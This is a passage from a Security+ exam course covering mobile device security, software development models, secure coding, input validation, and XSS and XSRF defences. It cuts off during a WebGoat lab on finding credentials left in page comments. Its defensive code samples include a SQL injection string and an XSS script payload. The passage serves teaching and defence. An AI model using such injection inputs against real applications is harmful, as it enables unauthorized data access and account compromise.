security risk, since anyone who has access to the device might automatically be able
to sign into all authenticated apps it has installed.
Geotagging Many mobile applications can append geographical metadata to photographs, videos,
messages, social media postings, and so on. Geotagging data generally includes
latitude, longitude, and a timestamp, but can also include altitude, place names, or
other information. Geotagging can be useful, but also a security and privacy risk: not
only does a geotagged photo show exactly where it was taken, but a geotagged media
posting shows where the user is at the moment. This could show the location of
valuables, or when a user is away from home or the workplace.
Encryption Mobile devices can encrypt secured data, as well as that transmitted over mobile
networks or secured Wi-Fi hotspots, but that doesn't give true end-to-end encryption.
VPNs allow encrypted network traffic even on unsecured Wi-Fi, while other mobile
apps allow encryption of VoIP, email, and text messaging services.
Push notifications Online services can send information to mobile applications without being specifically
requested, even if the application isn't running. This is extremely convenient for
messages and alerts, but some implementations contain security vulnerabilities that
might expose notification content along the way. Sensitive data should only be sent by
notification if it can be protected by end-to-end encryption.
Application Mobile applications typically request very specific device permissions on install, or
permissions when upgrades give them new capabilities. For example, an application might request
permission to access location data and send text messages. While this has security
benefits, it also means users get used to simply accepting permission requests without
reading them.
Containerization Sometimes the permissions system built into a mobile operating system doesn't give
sufficient security for sensitive applications. Special apps can be used to create secure
containers, sandboxes that certain applications run within. This helps to isolate
sensitive work applications from untrusted personal applications, especially in BYOD
or CYOD deployments where the employer has less direct control of the device.
Transitive trust Mobile applications make wide use of transitive permissions, where an application
authentication gets trust via another application or operating system function which itself has its own
set of permissions. While this isn't inherently insecure and in fact can be used for
enhanced security, it can also create situations where interdependent trust relationships
aren't easily apparent. Then it's easy for an unwitting user to agree to permissions
which compromise security.

Mobile device connections


The main benefit of mobile devices is that you can take them anywhere and even connect to networks almost
anywhere you go. This makes it very easy to connect to untrustworthy networks that might spy on your
communications or even infiltrate your device. Since they're primarily oriented around wireless networks, you
also have to be careful about eavesdroppers. Even a single device might support several types of connection
so you need to know how they work. If you're administering devices for your organization, you'll need to
choose network connections and policies based on your security requirements. In high security environments
you should use management software to monitor or restrict which connections allowed devices can use.

Exam Objective: CompTIA SY0-501 2.5.1, 2.5.3.10, 2.5.3.13, 2.5.3.14, 2.5.3.15

Wi-Fi The same 802.11 standards family used for wireless workstation connections. Wi-Fi is secure
from local eavesdropping if the AP uses strong authentication and encryption, but many do not
and most APs connect to non-encrypted Ethernet or WAN connections. It's also easy for an
attacker to set up a rogue AP designed to capture your data. If you don't trust a Wi-Fi network,
connect to it through a VPN. Wi-Fi Direct allows a mobile device to make an ad hoc connection
with another Wi-Fi device without connecting to a WAP. This is useful, but also helps attackers
who want to use a mobile device for data exfiltration without being seen on the corporate
network.
Cellular Used to place telephone calls, send text messages, and transfer network data over long
distances. Cellular connections have a much wider range than Wi-Fi, and use built-in
encryption and authentication so eavesdropping usually isn't a problem. Rogue cell towers are
possible but more difficult to set up than rogue APs: while they pose the same risks, they're less
common. Since a cellular connection allows data or SMS/MMS texts to be sent and received
independent of the enterprise network, it can be used for data exfiltration. Combined with Wi-Fi
or USB tethering, it can even create a direct connection between internal systems and the
internet, allowing inside network attacks.
Bluetooth Used to connect to wireless peripherals such as input devices or speakers in a long-term pairing
relationship. Also can be used to transfer files between devices without using the Wi-Fi
network. Bluetooth supports varying ranges, but most mobile devices and peripherals can
connect from up to ten meters away. Bluetooth connections are encrypted, but it's still possible
to connect to unsafe devices. It's best to turn off Bluetooth transceivers you don't use.
ANT A communications protocol designed for easy connections between fitness sensors such as heart
rate monitors, cycling computers and similar devices. It's similar to low-powered Bluetooth
standards, but isn't directly compatible; by and large it has the same security features and
weaknesses.
NFC Used for short-distance communications between smartphones and other personal devices,
usually no more than 10cm apart. Unlike Bluetooth it's meant for brief and isolated
communications rather than long-term pairing. NFC is secure enough to use for payment
systems like no-contact credit card scanners, but much of that safety is due to short range and
the fact that NFC sensors on phones turn off when not in active use.
SATCOM Satellite communications require more powerful and specialized transceivers than other
wireless methods, so they're usually only found in expensive satellite phones and external
satellite modems. The main threat to satellite communications is attacks by state actors, but
satellite devices may have backdoors or cryptographic weaknesses an attacker can target. Like
cellular connections, a satellite connection inside the enterprise represents a separate internet
connection.
Infrared Wireless communication using line-of-sight infrared. It was widely popular in the late 1990s
and early 2000s, but once Wi-Fi became widespread it fell by the wayside for consumer
devices. Infrared communications are still used in medical devices, legacy hardware, and
specialty applications where radio communications aren't feasible or desirable. Since many
infrared devices are old they tend to have weak or no encryption. Instead, the line-of-sight
nature of the connection provides some physical security.
USB The only wired data connection supported by most mobile devices smaller than laptops. Since
USB is wired it's less prone to eavesdropping or attack, but it's still a danger to connect to an
untrusted device (in either direction). Additionally, USB connections make mobile devices a
data exfiltration risk in the same way that any removable media is.

Hardening mobile operating systems


Compared to their desktop counterparts, especially in the past, mobile operating systems are fairly well
hardened. By default user accounts don't have root access, and apps run in sandboxes fairly separated from
each other, each with its own well-defined permissions. On top of that, most people get apps from trusted
sources like the Apple, Google, or Amazon app stores, all of which carefully monitor products for any sign of
malware. Finally, on the network mobile devices are less likely to run network server applications or old
insecure protocols than even desktop workstations: this means they're not subject to network attacks
exploiting server processes.
None of this is to say that you shouldn't actively secure a mobile operating system, especially in a high
security environment. It's just that the newest smartphone is going to be a lot safer to just put on the network
than an old Windows XP desktop.

 Apply security patches and updates as soon as they're available.


• OS updates can be large, so perform them over Wi-Fi to avoid data charges.
• Mobile updates are usually quick and painless, but it's safest to back up data beforehand in case
something goes wrong.
 Apps typically update automatically whenever a new version comes out. Updates might include boosted
security features.
• By default, apps only automatically update on Wi-Fi to save data charges.
• When a new app version requires additional permissions, you'll need to approve the update. Review
changes to make sure they're permissions you really want the app to have.


 Disable unused applications, services, and operating system features. For instance, if you don't use any
Bluetooth devices with your phone, disabling Bluetooth both removes an attack vector and increases
battery life.
 Consider the need for antivirus software.
• Despite some malware being discovered in the past, Apple considers iOS secure enough that
vulnerabilities can be fixed through OS updates alone. Consequently, they don't allow antivirus
software on their app store.
• Some Android vendors pre-install antivirus software, and others are available on Android app stores.
Note that the sandboxed nature of apps makes Android antivirus apps less able to actually remove
potential malware than desktop antivirus.
 Be careful not to install apps from untrusted sources, like poorly verified third-party app stores or private
developers.
• iOS by default only allows installation from Apple's App store. Getting around that usually requires
jailbreaking the phone, specifically permitting an app, or running an "app" that's really just a website.
• Android allows apps from third-party stores without much trouble, which is convenient but a potential
security risk. To ensure that only apps from trusted sources can run, tap Settings > Security, and clear
Unknown Sources.
 Firewalls are not generally necessary on mobile devices, but third party apps are available for Android.
Some require rooting the phone, but others do not.
 Be careful when joining unfamiliar or unsecured Wi-Fi networks: they could allow others to spy on your
communications. For regular communications over unsecured Wi-Fi, consider configuring a VPN.

Discussion: Securing mobile data and applications


1. Why is malware generally less of a threat on mobile devices?
Apart from operating system vulnerabilities, most mobile apps are downloaded from trusted stores and
run in sandboxes.
2. How can you protect your mobile device's data from being lost or stolen?
Possibilities include theft prevention, cloud backup, and device encryption.
3. How can geotagging be a security risk?
One example is that if you make a geotagged post saying that you're out of town, someone could try
breaking into your home or office.

Assessment: Mobile device security


1. What kind of application centrally manages security policy on all company mobile devices? Choose the
best answer.
 Asset tracking
 BYOD
 GPS
 MDM

2. Both iOS and Android include a built-in feature to find and secure a lost device. True or false?
 True
 False


3. Both iOS and Android enable data encryption on most devices by default. True or false?
 True
 False

4. What are important security steps on all mobile devices? Choose all that apply.
 Configuring antivirus software
 Configuring remote backup features
 Installing a firewall app
 Regularly applying operating system updates
 Using biometric authentication

5. What kind of policy governs a user-owned device on the corporate network? Choose the best response.
 Acceptable Use
 BYOD
 MDM
 Offboarding

6. Your company allows you to use the same smartphone for both personal and work purposes, but only if
it's one of a half-dozen different models on an approved list. If you don't have an approved device, the
company will pay for part of your upgrade. What kind of deployment model does the company use?
Choose the best response.
 BYOD
 COBO
 COPE
 CYOD

7. What kind of policy governs removal of sensitive data and credentials when a user device is no longer
used for company business?
 Asset tracking
 Offboarding
 Onboarding
 Storage segmentation

8. What connection type is very similar to Bluetooth but used by more specialized devices?
 ANT
 GSM
 NFC
 SATCOM


Summary: Securing hosts and data


You should now know:
 How to secure data at rest through classification, file permissions, and storage encryption.
 How to secure hosts, whether they're ordinary workstations, servers, or static devices.
 How to secure mobile devices and their data.



Chapter 7: Securing network services
You will learn:
 How to secure web applications
 About virtualization and cloud computing risks


Module A: Securing applications


Web applications are one of the main targets of attack today, and application vulnerabilities are responsible
for many of the most damaging data breaches in recent years. Securing them thoroughly can be challenging,
especially since so many interrelated components are often involved. It doesn't help that they often represent
the most direct bridge between the general public and your most valuable data. Still, most vulnerabilities fit in
set categories that you can look for and mitigate. Some of those are specific to web applications, while others
are common to all software development.
You will learn:
 About secure coding principles
 How to implement input validation
 How to prevent common application attacks
 How to harden applications

Software assurance
Saying that the best way to reduce application vulnerabilities is to use secure coding principles might sound
as pointless as saying the best way to win a ball game is to score more points than the other team. The
problem is, a lot of applications simply aren't designed with security as a primary consideration: developers
work around the clock to make sure everything works, and only then do they think about how to keep
attackers out. In practice, every application will have bugs and oversights that leave openings for attack, but
most exploits are prevented or greatly reduced when developers make security more than an afterthought.
When you're coding your own application, or heavily customizing an existing one, it's obviously your
responsibility to make sure it's securely coded. When you get an application more or less off the shelf you
don't have control over how it was coded, but you can still make sure that the developer designed it securely.
Software assurance resources and certifications are available for both developers and products.
 When buying software from a vendor, examine their security features, and ask questions about their
approach to secure design. Don't forget to look for user reviews and experiences, or ratings by
independent bodies. The Software Assurance Forum for Excellence in Code (SAFECode) is one
industry organization that's issued guidelines for purchasing secure applications.
 When coding an application in-house or through a contractor, ensure that developers are using secure
design principles. A wide variety of security standards and resources are available.

• Open Web Application Security Project (OWASP) is the closest thing to a standards body for web
applications in general.
• NIST and other security organizations have published standards relevant to application
development.
• If your application handles PII or other regulated data, make sure you comply with the applicable
regulations.
• For critical applications, consider a formal security review from an external consultant.

 Ensure that your development and operations teams work together with stakeholders to pursue a secure
product deployment cycle.

Software development models


Any software project that rates the word "development" is a serious enough undertaking that it can benefit
from a formal project management process. Application security in particular is an element that frequently
suffers because developers didn't have a development methodology that was sound enough to detect likely
issues while everyone was busy just "making it work."

Exam Objective: CompTIA SY0-501 3.6.1


The project management process for software development needs to take the entire product life cycle into
account, from when the application's requirements are mapped out to where it's finally retired. The two most
popular development models today are called Waterfall and Agile.

Waterfall vs. Agile development models

Waterfall development is the more traditional of the two. It breaks the software life cycle up into consecutive
phases, one after the other. The first formal description of the Waterfall model described six steps.
1. Requirements Determining what the software's functional and usability requirements will be, along with
the hardware and resources that will be required to run and support it.
2. Analysis Working with stakeholders to turn the requirements document into a product model of
sufficient detail to begin systems design. Some waterfall models incorporate this into the
requirements phase.
3. Design Creating detailed frameworks and algorithms for how the application will achieve its
functional and usability goals. The design phase maps out the application's look and feel,
chooses the technologies that will be used to develop it, and breaks it up into modular
components which can be coded separately.
4. Development The actual coding of individual modules, and integration of the application into a
functional whole.
5. Testing A systematic process of finding and removing software bugs, and verifying that it meets
stakeholder requirements.
6. Maintenance Deploying and maintaining the application throughout the remainder of its use.


The waterfall model is a great way to enforce discipline in a project and make sure no important problems are
missed, but it works best for projects that have well-defined phases and especially a well-defined finished
state. Its biggest problems are lack of flexibility; there's limited feedback at many phases of development, and
it's difficult to go back if requirements change before deployment.
By contrast, Agile development follows an iterative or incremental model. It was first formally described by
that name in the Agile Manifesto published in 2001, but its underlying principles have been practiced for a
long time. Instead of a monolithic project, development is broken up into many successive iterations that each
add a little bit more to the product. Each individual iteration has the same phases of requirements through
testing, representing a new software version. Not all iterations will actually be deployed into production, but
each represents a distinct release that can be shared across teams and with stakeholders. Agile development
allows fast delivery and constant user feedback, and it's well-suited to online or cloud distribution where
common software updates aren't difficult. On the other hand, it's more difficult to track documentation, and to
make sure the design principles - including security - remain sound throughout the project.
There are other popular development models as well. Most current trends are variants of Agile development.
One is continuous delivery, which aspires to an ideal where software is constantly being improved yet can be
released into production at any time. Another is DevOps, which is more a set of principles and general
practices than a development model. DevOps stresses the collaboration of developers and IT operations teams
to form an environment where software can be rapidly developed, tested, and released in a largely automated
process.

Secure DevOps practices


For the most part, the details of software development are matters for software developers and project
managers, but as a security professional you should help to make sure security is a primary goal through the
entire process. A lot of it is attention to detail and careful documentation to make sure vulnerabilities aren't
introduced or can be found and secured quickly, but iterative and continuous development processes make it
difficult. Fortunately, there are several popular DevOps principles which are useful for security in particular.

Exam Objective: CompTIA SY0-501 3.6.2

Security automation Designing functional and repeatable security tests which can be applied to each
new development iteration, with a minimum of human labor needed. (A minimal
example of such a test follows this table.)
Continuous integration Continuously merging source code created by different individual developers or
teams into a shared whole. This prevents divergence and conflicts between code
written by different developers, which is a frequent source of security
vulnerabilities.
Baselining Establishing a known good set of security requirements and configuration details
that support them, then using that baseline as a starting point and effective security
minimum for any necessary changes.
Immutable systems Deploying systems or other infrastructure as a monolithic instance that can be
replaced by the next iteration, but not modified or upgraded. This prevents
accidents during modification or configuration from introducing unforeseen
vulnerabilities. For example, each new version of an application might be
distributed as a virtual machine or system image preconfigured to the security
baseline.
Infrastructure as code Writing code that can provision or configure infrastructure such as servers and
network appliances, so that a new iteration can be deployed rapidly and with
minimal chance for error. This is more complex than writing deployment scripts:
the programmable infrastructure code must itself be developed according to secure
principles.
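
As a minimal sketch of the security automation idea above, the following script checks that a build serves a few required security headers and fails (with a nonzero exit code) if any are missing. The target URL and header list are placeholders; a real pipeline would pull them from the project's security baseline and run many more checks.

    import sys
    import urllib.request

    TARGET = "https://staging.example.com/"
    REQUIRED_HEADERS = ["Strict-Transport-Security", "X-Content-Type-Options"]

    def check_security_headers(url):
        # Request the page and list any required security headers that are absent
        with urllib.request.urlopen(url) as response:
            return [h for h in REQUIRED_HEADERS if h not in response.headers]

    if __name__ == "__main__":
        missing = check_security_headers(TARGET)
        if missing:
            print("FAIL: missing headers:", ", ".join(missing))
            sys.exit(1)   # a nonzero exit code fails the build in most CI tools
        print("PASS: required security headers present")

Because the same script runs unchanged against every iteration, it costs almost no human labor after it's written, which is the point of the practice.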


Program life cycles


When you think of application vulnerabilities, it's also helpful to imagine the software life cycle from the
perspective of the program itself. Every phase of a program's existence is a time when errors can occur, or
when attacks can take place.

Exam Objective: CompTIA SY0-501 3.6.7

Development When the program is being written in the first place, or edited from a previous version. At this
point it exists as source code intended to be read and edited at least in part by humans.
Compile When the program is being converted from source code into executable machine code by a
program called a compiler.
Linking When components of the program are connected to each other, including external libraries
containing functions not in the core program.
Distribution When the program is sent from the developer to the systems which will run it. This can
include printing to physical media or downloading from the internet.
Installation When the program is placed onto the system which will execute it. This can be as simple as
copying it to a hard drive, or might take extensive preparation to integrate with the operating
system and other applications.
Load time When the program is retrieved from storage and placed into memory so it can be executed.
Runtime When the program is actually being executed.

These phases don't necessarily take place in just that order. For example, some programs are distributed as
compiled machine code, while others are source code that is compiled during installation, or even right at
execution. Linking can be divided into static linking performed by the compiler during compilation, or
dynamic linking performed by the operating system during load time or runtime.


Deployment environments
Another term for the whole process of getting software ready for use is deployment. It's a bit broader than
"development" because it explicitly covers both applications your organization develops itself, and off-the-
shelf solutions you just need to put into production. Since you're ultimately responsible for vulnerabilities in
the end result, awareness of the whole process is important either way.

Exam Objective: CompTIA SY0-501 3.4.1, 3.4.2, 3.4.3


Every stage of the deployment process needs its own deployment environment of appropriate hardware and
software. This prevents the risks of using untested and potentially unsafe code on production systems. Secure
baselines and appropriate sandboxing prevent unstable or malicious programs from affecting other systems. A
typical deployment process might include four environments.

Development The environment where the application is initially written and compiled, such as a developer's
workstation. Development environments are frequently very different from the production
environment, but that's acceptable because they don't need to support testing of a complete, working product.
Test A software environment on a physical or virtual computer which allows a more-or-less
complete application to be tested by humans or automated tools. Some projects use many test
environments running in parallel to allow more rapid and automated testing.
Staging A pre-production environment that closely mirrors the intended production environment, and
even connects to external databases or other software environments. A staging environment is
still intended for testing purposes, but it's better suited for testing system configurations and
the software's ability to withstand attacks or heavy loads.
Production The environment used for the final, functional software.

Some projects use additional environments. For example, you might create an experimental sandbox
environment for testing ideas you don't plan on putting in production, or a disaster recovery environment that
can take over for a failed production environment.
Every environment needs to have security controls to protect it against potential threats, but the threats facing
each environment are different, so each needs a different set of baselines.
 Production environments are typically the most visible to outside attack, and system failure in a
production environment will do the most harm to business functions.
 Staging environments are an ideal time to test security controls, so should be protected similarly to
production environments.
 Test and especially development environments are a tempting target for an attacker who wants to
examine application functions, or to steal or modify source code.
 Any environment that handles sensitive data such as PII can expose that data to a successful attacker.
Where possible, security in test or staging environments can be enhanced by using placeholder data
rather than real data.

Discussion: Secure development


1. What custom software does your organization use? If none, what might it find useful?
Answers may vary.
2. Choose a piece of software you know well. What can you say about its development life cycle?
Answers may vary.
3. Why is it more secure to distribute a software product as an immutable system?
It helps prevent user error or compatibility issues when installing or upgrading the software.


Secure coding principles


While the security features needed by a given application depend on exactly what it does and what tools are
used to design it, securely coded and configured applications follow the same general principles. Most of
them come down to the same central idea: applications should be as distrusting as possible when they deal
with other applications or with end users.

Exam Objective: CompTIA SY0-501 1.6.4, 3.6.5.1, 3.6.5.2, 3.6.5.6, 3.6.5.10, 3.6.5.12

Least privilege Applications should be restrictive not only of the privileges they give to users, but
also of those they give to other applications or components they interact with. Poorly
designed and configured applications often run in privileged environments, and easily pass
those privileges on to related components or even anonymous users.
Input validation Insecure web applications will attempt to process whatever input data they receive, whether
it's what they expect or not. Carefully malformed data can be used to perform injection
attacks or buffer overflows, enabling an attacker to compromise a whole application just
by filling a field out improperly. Secure applications validate all input they receive before
processing it, and reject anything unexpected.
Input Web applications commonly interact with back end databases or command shells, passing
sanitization user input on as part of SQL queries or other commands. This allows injection attacks: if
the input itself resembles valid code, the back end system might process its commands
along with the application query. Sufficiently strict validation can prevent this too, but for
secure coding it's safer and easier to sanitize the input by adding escape characters before
passing it on. That way, even if a valid input resembles code, it won't be treated as such.
Cryptography Cryptographic technologies can be used in many ways to protect data and applications. You
should use strong encryption for connections over sensitive networks, and possibly for
storage. File integrity can be protected by hashing, and program authenticity by code
signing. Weak ciphers or implementations can be as bad as none at all, so be sure to use
proven technologies rather than coding custom methods.
Code Most coding languages allow comments which are ignored by the compiler or interpreter
commentary but are meaningful to a human reviewing source code. They may contain notes and
placeholders made during development, or explanations of what the code itself does to
anyone who might review or edit it later. Programmers have varying views of how much
commentary is appropriate in a program, but all agree that code that might be seen by an
untrusted viewer (such as that of a web page) should never contain sensitive information in
its comments.
Data exposure Insecure applications frequently do not adequately protect sensitive information they store,
transmit, or execute. Sensitive data such as session tokens, passwords, and PII in database
fields should never be readable by untrusted users or processes. Strong cryptography is a
good way to protect data, but the first step is making sure all sensitive data is identified so
that it can be protected. In particular, encryption keys and certificates must also be stored
and transmitted such that private keys are never exposed to someone who shouldn't have
them.
Memory Carelessness with how memory and variables are allocated and used can leave an
management application vulnerable to memory leaks as well as all sorts of attacks: null pointer
dereferences, race conditions, buffer overflows, or integer overflows. Secure applications
release dynamically allocated memory when it's no longer needed, and protect pointers and
variables with a combination of careful coding, language tools, and operating system
protections.
Error and Applications need to handle errors gracefully. That doesn't just mean they don't crash when
exception something unexpected happens: it's also important that they don't create security
handling vulnerabilities when they react. Secure applications should in general be fail safe designs,
rather than fail open.
 When something goes wrong or an authentication process seems ambiguous, the
application should err on the side of denying authorization.
 Applications should not commit to multi-step processes unless they can be
completed entirely: for example, if a database value is supposed to be moved from
one field to another, the original value shouldn't be deleted if there's an error writing
to the new location.
 Error messages shown to end users should have little data that's of use to an attacker.
Detailed debug messages can contain sensitive information of all sorts up to and
including database dumps. Even less detailed error messages can help an attacker
fine tune an attack by playing "hot or cold" with the results. For example, imagine
you're an attacker guessing random user names and passwords to log into an
application. A "wrong password for username jsims" error suggests that you guessed
a valid user name and now just need to crack the password. A "wrong user
name/password" error doesn't tell you anything useful.
 In contrast to messages sent to end users, error logging recorded for application
administrators should be logged in detail, including not only the nature of the error,
but the content and source of the input that generated it. This helps both application
debugging and detection of potential attacks.
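
The fail-safe guidance above can be illustrated with a short sketch. Here check_credentials() is a hypothetical helper standing in for the application's real authentication code; the point is that the user sees only a generic message while the details go to a log that administrators can review.

    import logging

    log = logging.getLogger("auth")

    def login(username, password, source_ip):
        try:
            if check_credentials(username, password):   # hypothetical helper
                return "Welcome!"
            # Record the specifics for administrators...
            log.warning("Failed login for %r from %s", username, source_ip)
            # ...but give the user nothing that helps fine-tune an attack.
            return "Invalid user name or password."
        except Exception:
            # On any unexpected error, fail safe: deny access and log the details.
            log.exception("Error during login for %r from %s", username, source_ip)
            return "Invalid user name or password."
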

Input validation
Imagine that your bank has a web form that requires users to input a 12-digit account number. What happens
if someone fills it out with 10 digits, or 20, or 200? What if it's their full name, or a random string of
characters? How about an SQL query to delete the "Users" table? What if they paste in a binary file
containing a virus? If the web application uses good input validation, all the user would see is an error
message saying something like "Account number should be 12 digits without dashes." You've doubtless seen
the like when you filled out a web form improperly in the past. The problem is that a lot of applications
don't do this, or don't do it consistently and thoroughly enough to protect against the many attacks relying on
similar exploits. This means that the wrong data coming into the application from a web user might cause any
sort of damage from database corruption to data breaches to system crashes.

Exam Objective: CompTIA SY0-501 3.6.5.3


Input validation functions can validate queries by filtering for various problems that might cause errors or
allow exploits.


Improper characters Most fields are designed to hold certain data types. If a field is designed for only
numbers, it shouldn't allow letters or special characters. Even a field allowing special
characters might only allow certain ones. An email address needs to have a @
somewhere in it to be valid. Some fields should always follow a fixed format: for
example a US social security number should always follow the format ###-##-####.
In that case, a developer could even program the field to automatically insert the
dashes if the user does not, or strip them out before passing them on to the database,
depending on how they're stored.
Unicode characters Fields accepting Unicode text input are a special case of improper characters.
Unicode text allows thousands of different characters, but often the same visual
character can be encoded in multiple different ways. Since to a computer the code is
the important part, it's often a good idea to normalize Unicode input, converting it so
that the underlying code for any given character is always the same.
Improper length Many fields have a minimum or maximum length: for example, a US Zip code is
always either 5 or 9 digits. Buffer overflow attacks rely on sending more data than an
application expects, so it's most important to set maximum lengths for a given field.
Improper values Some fields, especially numeric ones, might be used as variables in program
functions, and a value outside of the expected range can cause problems. For
example, no one should be able to enter a negative monetary value when making an
online payment, and improperly large values in other fields can trigger integer
overflow or buffer overflow problems.
SQL code SQL injection attacks can happen when carefully crafted SQL code entered into an
input field is passed on to a back end database that unwittingly executes it as a query.
Filtering characters like -, =, and ' can prevent this. In fields where the characters or
even the code itself otherwise make sense, such as the message field for someone
posting on a coding forum, the input still needs to be sanitized by marking those
characters so the database knows they're not part of a command. The same is true of
other database query languages, though they use different commands and syntax.
Browser code XSS attacks work by inserting scripts using browser-side languages like JavaScript,
HTML, or Flash into fields where a target's web browser will mistake them for
trusted page content. Even just blocking or sanitizing the < and > characters used by
HTML tags can prevent most of these.
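
Pulling a few of these checks together, here's a minimal server-side validator for the bank's 12-digit account number field from the earlier example. The function name, length limit, and error text are illustrative rather than taken from any particular framework.

    import re

    ACCOUNT_PATTERN = re.compile(r"^\d{12}$")   # exactly 12 digits, nothing else
    MAX_LENGTH = 64                             # reject absurdly long input outright

    def validate_account_number(value):
        if len(value) > MAX_LENGTH:
            return "Input too long."
        value = value.strip().replace("-", "")  # normalize: trim whitespace, drop dashes
        if not ACCOUNT_PATTERN.match(value):
            return "Account number should be 12 digits without dashes."
        return None   # None means the input passed validation
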

Client-side vs. server-side validation


You can perform input validation either on the client, or on the server.

Exam Objective: CompTIA SY0-501 3.6.5.4, 3.6.5.9

 Client-side validation uses browser scripts in the page initially sent by the server. Its main advantage is
that it can work instantaneously without network communication. If a basic web form simply prevents
you from typing too many digits into the phone number field, or shows an error message about an
improper value as soon as you move to the next field, it's probably using client-side validation.
 Server-side validation uses code on the web application server to validate input before the rest of the
program actually acts on it. Its main advantage is that it can't be bypassed by flaws or modifications
made to the browser, but there's no way of doing it without sending data to the server. For a simple web
form, server-side validation won't catch an error until you submit the form and receive an error
message in reply.


Client-side validation is more convenient, and often easier to implement, but it poses a security risk. Since
users, including attackers, have control of their browser environments, they can block or alter scripts they
don't like. An attacker can even directly alter the HTTP output sent from their browser before it actually
reaches the server. If you have to pick only one, server-side validation is always better for security.
Fortunately, there's no need to choose. By implementing the same validation standards both client-side and
server-side, you can have the benefits of both.
Related to input validation, one of the prime server-side protections against injection attacks is in
programming just how the application sends queries to the database.
 Applications can use prepared statements, prewritten queries written with placeholder values which are
compiled once rather than every time they're run. When the application submits the query again it just
fills user data into the placeholders without the database having to parse it all over again. Not only does
this improve performance, it makes it easier for the database to separate query structure from data.
 Databases can use stored procedures, prewritten queries that are stored inside the database logic itself.
The application then just needs to call the procedure and pass on user data. The security and
performance benefits are similar to that of prepared statements, but which is easier to implement
depends on the application and server structure.

Neither prepared statements nor stored procedures are perfect proof against injection attacks, and when
implemented badly they might actually hurt security. You still need to perform input validation, and carefully
manage permissions when servers and processes communicate with each other.
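
For illustration, here's a minimal parameterized query using Python's built-in sqlite3 module as a stand-in for a production database; the table and column names are invented. The ? placeholder keeps user input strictly as data, so whatever the user types can't rewrite the query structure.

    import sqlite3

    def find_user(conn, username):
        # The query text is fixed; username is passed separately as a parameter
        cur = conn.execute("SELECT id, name FROM users WHERE name = ?", (username,))
        return cur.fetchone()

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO users (name) VALUES (?)", ("jsims",))
    print(find_user(conn, "jsims"))              # (1, 'jsims')
    print(find_user(conn, "jsims' OR '1'='1"))   # None: treated as a literal string
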

XSS prevention
Cross-site scripting attacks are dangerous because they can potentially allow an attacker to take full control
of a victim's browser, doing whatever it can do. This doesn't just let them mess with stored browser data or
client computer resources, it also allows them to attack web applications they're logged onto, using the
victim's privileges.
Stored and reflected XSS attacks can be prevented by server-side validation and sanitization. Creating
effective filters requires an in-depth knowledge of XSS techniques, but OWASP gives the following basic
guidelines.

1. Never insert untrusted data except in allowed locations.
2. Apply HTML escapes before inserting untrusted data into HTML element contents.
3. Apply attribute escapes before inserting untrusted data into HTML common attributes.
4. Apply JavaScript escapes before inserting untrusted data into HTML JavaScript data values.
5. Apply CSS escapes and strict validation before inserting untrusted data into HTML style property values.
6. Apply URL escapes before inserting untrusted data into HTML URL parameter values.
7. Use a sanitizing library specially designed to parse and clean HTML input.
These rules aren't easy to perfectly nail down, so it's also good practice to implement risk mitigation
techniques. One recommended method is to set the HTTPOnly flag on your session cookies and any other
custom cookies that aren't directly accessed by your JavaScript.
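
As a minimal sketch of rule 2, here's untrusted data being escaped with Python's standard html module before it's placed inside HTML element content; real applications usually rely on their template engine's automatic escaping rather than doing this by hand.

    import html

    def render_comment(untrusted_text):
        safe = html.escape(untrusted_text)   # converts & < > " ' to HTML entities
        return '<p class="comment">' + safe + '</p>'

    print(render_comment("<script>alert('xss')</script>"))
    # <p class="comment">&lt;script&gt;alert(&#x27;xss&#x27;)&lt;/script&gt;</p>
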
DOM-based XSS attacks require a different strategy, since the malicious code works entirely within the
victim's browser and may never be seen by the server. Validation has to be performed by carefully designed
client-side scripts. Alternative approaches include blocking scripts on client browsers, or using intrusion
protection on either the client or the server to recognize signatures of an attack.

XSRF prevention
Cross-site request forgery is a distinct attack from XSS, and requires different protections. Typically, XSRF
(or CSRF) relies on a malicious link or message that inserts code into the victim's browser, causing it to
perform unwanted actions on a legitimate site the victim is already authenticated on. XSS prevention can't
directly stop this, though it can be used to circumvent XSRF protections, so it's important to do both in
concert.
Some developers have tried to prevent XSRF through means such as secret cookies, multi-step transactions,
URL rewriting, or restricting transactions to HTTP POST requests, but those are all ineffective or easy to
bypass. A more effective route is synchronizer tokens, cryptographically secure random tokens valid only for
a single session. Other methods include checking referer headers and origin headers, or requiring direct
human input such as CAPTCHA or re-authentication using a typed password.
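
A synchronizer token scheme can be sketched in a few lines; here the session object is a plain dictionary standing in for a real framework's session store, and the form-handling code that calls these functions is omitted.

    import hmac
    import secrets

    def issue_token(session):
        # Generate an unpredictable per-session token and remember it server-side
        token = secrets.token_urlsafe(32)
        session["xsrf_token"] = token
        return token   # embed this in a hidden field of each form

    def verify_token(session, submitted):
        expected = session.get("xsrf_token", "")
        # compare_digest avoids leaking information through timing differences
        return bool(expected) and hmac.compare_digest(expected.encode(), submitted.encode())

A forged request from another site won't know the token, so verify_token() fails and the state-changing action is refused.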

Exercise: Finding vulnerable code


In this exercise, you'll review code and validation features in WebGoat.
Do This How & Why

1. In the Dojo VM, start WebGoat. WebGoat is a deliberately insecure web application OWASP
uses to demonstrate application vulnerabilities.

After a few moments, WebGoat opens in Firefox.


a) Click > Targets > WebGoat NG Start

b) Sign in with user name guest and The main application opens.
password guest

2. Review a login page for developer Web page source code shouldn't have any sensitive
comments. information, but since it's hidden from most users many
developers don't think much about it.

a) In the navigation pane, click Code This is a login page for a web application. Attackers know to
Quality > Discover Clues in the review source code for comments that suggest backdoors or
HTML. weaknesses they can search for.

b) Right-click the User Name field The Developer Tools Page Inspector pane opens below the page. It
and click Inspect Element. shows the page source code.

c) Point in the left pane of the Page Inspector.
As you point to each line in the Inspector, a blue box surrounds the corresponding element on the page itself.


d) Scroll up until you find the You'll know you're pointing at it when the highlight box
<form> tag in the Inspector. surrounds the entire "Sign In" form on the page.

The developer left a FIXME comment including what looks like administrator credentials.

e) Close the Developer Tools pane. Click Close at the corner of the pane.

f) Sign in with user name admin and password adminpw
The credentials work, meaning that anyone who thinks to read the page source code has a backdoor into the application. Before this goes into production you'll need to review all the application code for similar issues.

3. Test input validation in a web form. To secure a web application, you need to minimize the chance
of bad input causing unexpected behavior. One example of this
is making sure all form fields only accept valid responses.

a) In the navigation pane, click This page has seven form fields, each with unique formatting
Parameter Tampering > Bypass requirements. According to your database administrator, badly
Client Side JavaScript formatted data reaching the back-end database could be very
Validation. harmful. This means it's essential that a malicious user can't
enter anything inappropriate.

b) For each field on the form, enter You can save some time by just copying and pasting some
